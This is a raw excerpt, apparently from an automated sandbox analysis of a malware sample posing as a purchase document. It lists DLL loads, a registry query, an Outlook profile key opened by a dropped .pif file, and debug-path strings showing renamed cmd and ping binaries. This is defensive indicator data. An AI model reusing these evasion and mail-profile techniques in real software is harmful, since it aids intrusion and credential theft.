                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: webio.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: ??????????.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: ??.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: ??.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: ??.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: ??????????.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: ??????????.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe Static file information: File size 1264128 > 1048576
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: ymafvvdS.pif, 00000009.00000003.2241637142.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: ymafvvdS.pif, 00000009.00000003.2312451071.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2322898064.00000000247E0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2313769391.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: ymafvvdS.pif, 00000009.00000003.1580591877.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msiexec.pdb source: ymafvvdS.pif, 00000009.00000003.1700911877.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: ymafvvdS.pif, 00000009.00000003.1940616402.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdb source: ymafvvdS.pif, 00000009.00000003.1787107994.0000000026BA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVClient.pdb source: ymafvvdS.pif, 00000009.00000003.1633670548.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: ymafvvdS.pif, 00000009.00000003.2082255525.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: ymafvvdS.pif, 00000009.00000003.2082255525.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msiexec.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1700911877.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ADelRCP_Exec.pdb source: ymafvvdS.pif, 00000009.00000003.2097354013.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.2369897721.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2373134718.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: ymafvvdS.pif, 00000009.00000003.1664213164.000000002A570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerceptionSimulationService.pdb source: ymafvvdS.pif, 00000009.00000003.1713087935.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: ymafvvdS.pif, 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: ymafvvdS.pif, 00000009.00000003.2057718300.000000002A440000.00000004.00001000.00020000.00000000.sdmp, SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: MsSense.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1732759810.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: ymafvvdS.pif, 00000009.00000003.2235576907.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: ymafvvdS.pif, 00000009.00000003.2352471485.0000000024870000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: MsSense.pdb source: ymafvvdS.pif, 00000009.00000003.1732759810.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: ymafvvdS.pif, 00000009.00000003.2254314315.00000000247F0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2262955419.0000000024590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000016.00000000.1659735755.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000021.00000002.1771358860.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000022.00000002.1777105344.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000025.00000000.1779655078.0000000000191000.00000020.00000001.01000000.0000000A.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021D10000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209AA000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1561847890.0000000021CDF000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.000000002097A000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.00000000024F6000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1580684456.0000000000AF6000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1838933224.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ping.pdb source: esentutl.exe, 0000000B.00000003.1605531348.0000000005490000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000017.00000000.1660461231.0000000000771000.00000020.00000001.01000000.0000000B.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: ymafvvdS.pif, 00000009.00000003.2130368671.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb((( source: ymafvvdS.pif, 00000009.00000003.1948869913.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: locator.pdb source: ymafvvdS.pif, 00000009.00000003.1724937855.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1729612857.0000000026950000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1642151858.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ADelRCP_Exec.pdbCC9 source: ymafvvdS.pif, 00000009.00000003.2097354013.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: ymafvvdS.pif, 00000009.00000003.1967395984.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209AA000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.000000002097A000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1580684456.0000000000AF6000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb source: ymafvvdS.pif, 00000009.00000003.1948869913.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1559563944.0000000005730000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000012.00000002.1647022839.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1659735755.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000021.00000002.1771358860.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000022.00000002.1777105344.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000025.00000000.1779655078.0000000000191000.00000020.00000001.01000000.0000000A.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: ymafvvdS.pif, 00000009.00000003.2312451071.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2322898064.00000000247E0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2313769391.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 0000000B.00000003.1605531348.0000000005490000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000000.1660461231.0000000000771000.00000020.00000001.01000000.0000000B.sdmp
                  Source: Binary string: easinvoker.pdbH source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: ymafvvdS.pif, 00000009.00000003.2057718300.000000002A440000.00000004.00001000.00020000.00000000.sdmp, SingleClientServicesUpdater.exe.9.dr
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: ymafvvdS.pif, 00000009.00000003.2153849793.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: ymafvvdS.pif, 00000009.00000003.1940616402.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: ymafvvdS.pif, 00000009.00000003.2369897721.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2373134718.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: 64BitMAPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2219413171.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1750131417.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1692731195.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerceptionSimulationService.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1713087935.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb source: ymafvvdS.pif, 00000009.00000003.1687218296.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerfHost.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1723219239.0000000026950000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1718639908.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1717822297.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: ymafvvdS.pif, 00000009.00000003.2352471485.0000000024870000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.9.dr
                  Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: ymafvvdS.pif, 00000009.00000003.2199797397.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: ymafvvdS.pif, 00000009.00000003.2130368671.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVClient.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1633670548.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PerfHost.pdb source: ymafvvdS.pif, 00000009.00000003.1723219239.0000000026950000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1718639908.000000002A520000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1717822297.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: ymafvvdS.pif, 00000009.00000003.2206197003.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: ymafvvdS.pif, 00000009.00000003.2241637142.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: ymafvvdS.pif, 00000009.00000003.2153849793.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: ymafvvdS.pif, 00000009.00000003.2235576907.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb` source: ymafvvdS.pif, 00000009.00000003.1687218296.000000002A520000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: ymafvvdS.pif, 00000009.00000003.2254314315.00000000247F0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2262955419.0000000024590000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdb source: ymafvvdS.pif, 00000009.00000003.1798231706.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdbGCTL source: ymafvvdS.pif, 00000009.00000003.1798231706.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: ymafvvdS.pif, 00000009.00000003.1838933224.000000002A430000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: ymafvvdS.pif, 00000009.00000003.2161636209.000000002A440000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb source: ymafvvdS.pif, 00000009.00000003.1608878398.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdb source: ymafvvdS.pif, 00000009.00000003.1692731195.000000002A530000.00000004.00001000.00020000.00000000.sdmp
